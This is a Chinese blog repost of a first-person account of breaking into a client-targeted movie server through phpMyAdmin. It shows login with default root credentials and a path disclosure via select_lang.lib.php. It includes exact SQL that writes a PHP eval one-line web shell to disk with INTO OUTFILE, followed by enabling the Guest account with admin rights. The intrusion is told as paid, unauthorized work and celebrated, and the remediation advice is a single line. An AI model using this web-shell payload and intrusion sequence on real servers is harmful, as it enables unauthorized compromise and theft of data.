关于PHPMYADMIN的入侵提权拿服务器

2024-06-10 03:08

本文主要是介绍关于PHPMYADMIN的入侵提权拿服务器,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

转自:http://hi.baidu.com/0o1znz1ow/item/651d3bddbd9b7cf03cc2cb1e

作者不详

关于PHPMYADMIN的入侵提权拿服务器

1.今天收到客户一个单子,说是要黑一台电影服务器,然后给了我IP 61.147.*.*

打开网站一看,发现是用FLEAPHP写的一个程序

因为刚好在研究FLEAPHP开源开发系统,大致了解一些语法,可是没有能利用的,而且整个服务器也只有这么一个网站

2.FleaPHP 为开发者轻松、快捷的创建应用程序提供帮助。FleaPHP 框架简单、清晰,容易理解和学习,并且有完全中文化的文档和丰富的示

例程序降低学习成本。
使用 FleaPHP 框架开发的应用程序能够自动适应各种运行环境,并兼容 PHP4 和 PHP5。


3.既然是PHP那肯定有PHPMYADMIN,尝试着在网站地址后 加入 61.147.*.*/phpmyadmin

哈哈,能直接打开,这时候,就差用户名和密码了

因为事先在看网站的时候,我直接在网站地址后加了个 61.147.*.*/ROOT

没想到能查看他的目录,所以,我在 PHPMYADMIN里面就用默认用户

ROOT ROOT

成功登陆

发现他有三个数据库。。这时候就要利用到 PHPMYADMIN的入侵了

4.首先 打开phpmyadmin

http://61.147.*.*/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.

就是在PHPMYADMIN后面加 libraries/select_lang.lib.php

得到他的路径 C:APMhtdocsphpMyAdminlibraries

这个一定要记录下来

然后 进入PHPMYADMIN

用默认用户进去

运行 SQL语句

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES("<?php eval($_POST[1]);?>");
select cmd from a into outfile "C:/APM/htdocs/phpMyAdmin/libraries/d.php";
Drop TABLE IF EXISTS a;


语句详细意思

创建一个A表 写入 <?php eval($_POST[1]);?>
熟悉这个的都知道 <?php eval($_POST[1]);?>这个就是一句话了

1是密码 可以自行修改

把里面的信息输出到 phpMyAdmin/libraries/d.php
这个文件

d.php 名字也可以自己入

Drop TABLE IF EXISTS a   如果有 A表 将删除


然后执行

OK 写入成功

这个时候用一句话连接

传上SHELL

进去 一查 原来是个WIN系统

开启GUEST 给予管理权限

服务器成功到手

1.5T的电影 呵呵


此方法一是爆出了路径 二是管理员大意 没有修改默认密码

所以

漏洞详细解决方法:
就是修改管理员密码

这样 可以阻止黑客进入PHPMYADMIN进行SQL运行

当然 IDC商也要禁止客户商的一些权限

这样就可以保证了

这篇关于关于PHPMYADMIN的入侵提权拿服务器的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1047053

相关文章

Windows server服务器使用blat命令行发送邮件

《Windowsserver服务器使用blat命令行发送邮件》在linux平台的命令行下可以使用mail命令来发送邮件,windows平台没有内置的命令,但可以使用开源的blat,其官方主页为ht... 目录下载blatBAT命令行示例备注总结在linux平台的命令行下可以使用mail命令来发送邮件,Win

Ubuntu 22.04 服务器安装部署(nginx+postgresql)

《Ubuntu22.04服务器安装部署(nginx+postgresql)》Ubuntu22.04LTS是迄今为止最好的Ubuntu版本之一,很多linux的应用服务器都是选择的这个版本... 目录是什么让 Ubuntu 22.04 LTS 变得安全?更新了安全包linux 内核改进一、部署环境二、安装系统

nginx配置多域名共用服务器80端口

《nginx配置多域名共用服务器80端口》本文主要介绍了配置Nginx.conf文件,使得同一台服务器上的服务程序能够根据域名分发到相应的端口进行处理,从而实现用户通过abc.com或xyz.com直... 多个域名,比如两个域名,这两个域名其实共用一台服务器(意味着域名解析到同一个IP),一个域名为abc

pycharm远程连接服务器运行pytorch的过程详解

《pycharm远程连接服务器运行pytorch的过程详解》:本文主要介绍在Linux环境下使用Anaconda管理不同版本的Python环境,并通过PyCharm远程连接服务器来运行PyTorc... 目录linux部署pytorch背景介绍Anaconda安装Linux安装pytorch虚拟环境安装cu

MySQL 中的服务器配置和状态详解(MySQL Server Configuration and Status)

《MySQL中的服务器配置和状态详解(MySQLServerConfigurationandStatus)》MySQL服务器配置和状态设置包括服务器选项、系统变量和状态变量三个方面,可以通过... 目录mysql 之服务器配置和状态1 MySQL 架构和性能优化1.1 服务器配置和状态1.1.1 服务器选项

ElasticSearch+Kibana通过Docker部署到Linux服务器中操作方法

《ElasticSearch+Kibana通过Docker部署到Linux服务器中操作方法》本文介绍了Elasticsearch的基本概念,包括文档和字段、索引和映射,还详细描述了如何通过Docker... 目录1、ElasticSearch概念2、ElasticSearch、Kibana和IK分词器部署

部署Vue项目到服务器后404错误的原因及解决方案

《部署Vue项目到服务器后404错误的原因及解决方案》文章介绍了Vue项目部署步骤以及404错误的解决方案,部署步骤包括构建项目、上传文件、配置Web服务器、重启Nginx和访问域名,404错误通常是... 目录一、vue项目部署步骤二、404错误原因及解决方案错误场景原因分析解决方案一、Vue项目部署步骤

Linux流媒体服务器部署流程

《Linux流媒体服务器部署流程》文章详细介绍了流媒体服务器的部署步骤,包括更新系统、安装依赖组件、编译安装Nginx和RTMP模块、配置Nginx和FFmpeg,以及测试流媒体服务器的搭建... 目录流媒体服务器部署部署安装1.更新系统2.安装依赖组件3.解压4.编译安装(添加RTMP和openssl模块

JavaWeb-WebSocket浏览器服务器双向通信方式

《JavaWeb-WebSocket浏览器服务器双向通信方式》文章介绍了WebSocket协议的工作原理和应用场景,包括与HTTP的对比,接着,详细介绍了如何在Java中使用WebSocket,包括配... 目录一、概述二、入门2.1 POM依赖2.2 编写配置类2.3 编写WebSocket服务2.4 浏

查询SQL Server数据库服务器IP地址的多种有效方法

《查询SQLServer数据库服务器IP地址的多种有效方法》作为数据库管理员或开发人员,了解如何查询SQLServer数据库服务器的IP地址是一项重要技能,本文将介绍几种简单而有效的方法,帮助你轻松... 目录使用T-SQL查询方法1:使用系统函数方法2:使用系统视图使用SQL Server Configu